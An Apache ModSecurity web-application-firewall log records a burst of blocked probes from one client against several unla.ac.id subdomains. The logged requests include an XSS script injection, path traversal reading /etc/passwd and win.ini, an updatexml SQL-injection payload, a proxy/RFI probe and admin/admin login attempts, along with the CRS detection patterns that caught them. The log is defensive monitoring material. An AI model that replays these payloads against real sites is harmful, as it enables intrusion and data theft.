[Tue Aug 29 11:42:54.406250 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdTBCYAAAAY"]
[Tue Aug 29 11:42:54.412560 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAeYby8AAAAB"]
[Tue Aug 29 11:42:54.451512 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdftUgAAAAG"]
[Tue Aug 29 11:42:54.454366 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAd233AAAAAI"]
[Tue Aug 29 11:42:54.460246 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAQSW3MAAAA0"]
[Tue Aug 29 11:42:54.465533 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAd4azMAAAAj"]
[Tue Aug 29 11:42:54.467345 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdOeTcAAAAS"]
[Tue Aug 29 11:42:54.528977 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdqbFYAAAAR"]
[Tue Aug 29 11:42:55.375988 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13T8Co-f0AAAeoA-oAAAAT"]
[Tue Aug 29 11:42:55.445182 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13T8Co-f0AAAd64SMAAAAp"]
[Tue Aug 29 11:42:56.377731 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13UMCo-f0AAAdQ3iwAAAAV"]
[Tue Aug 29 11:42:56.414027 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13UMCo-f0AAAeX1CsAAAAK"]
[Tue Aug 29 11:42:57.393381 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAd233QAAAAI"]
[Tue Aug 29 11:42:57.435921 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAeChY4AAAAw"]
[Tue Aug 29 11:42:57.451830 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAd64SYAAAAp"]
[Tue Aug 29 11:42:57.456166 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAd9UNwAAAAr"]
[Tue Aug 29 11:42:57.456185 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAdECcIAAAAW"]
[Tue Aug 29 11:42:58.384707 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UsCo-f0AAAd9UN0AAAAr"]
[Tue Aug 29 11:42:59.515512 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAdUc4EAAAAZ"]
[Tue Aug 29 11:42:59.687919 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAXNuYIAAAAg"]
[Tue Aug 29 11:42:59.697702 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAdxUTkAAAAC"]
[Tue Aug 29 11:42:59.708033 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAd64SoAAAAp"]
[Tue Aug 29 11:42:59.708227 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAc@cawAAAAL"]
[Tue Aug 29 11:43:00.400640 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAdftVAAAAAG"]
[Tue Aug 29 11:43:00.403313 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdECccAAAAW"]
[Tue Aug 29 11:43:00.404988 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAQSW30AAAA0"]
[Tue Aug 29 11:43:00.405070 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13VMCo-f0AAAbo-foAAAAi"]
[Tue Aug 29 11:43:00.405256 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAc361AAAAAO"]
[Tue Aug 29 11:43:00.416854 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdxUToAAAAC"]
[Tue Aug 29 11:43:00.419385 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAcsLH0AAAAE"]
[Tue Aug 29 11:43:00.421360 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAeChZQAAAAw"]
[Tue Aug 29 11:43:00.422864 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAc@ca4AAAAL"]
[Tue Aug 29 11:43:00.424611 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdECcgAAAAW"]
[Tue Aug 29 11:43:00.426471 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdQ3jIAAAAV"]
[Tue Aug 29 11:43:00.432739 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAARpg3wAAAAU"]
[Tue Aug 29 11:43:00.439264 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdxUTsAAAAC"]
[Tue Aug 29 11:43:00.480068 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAeX1DMAAAAK"]
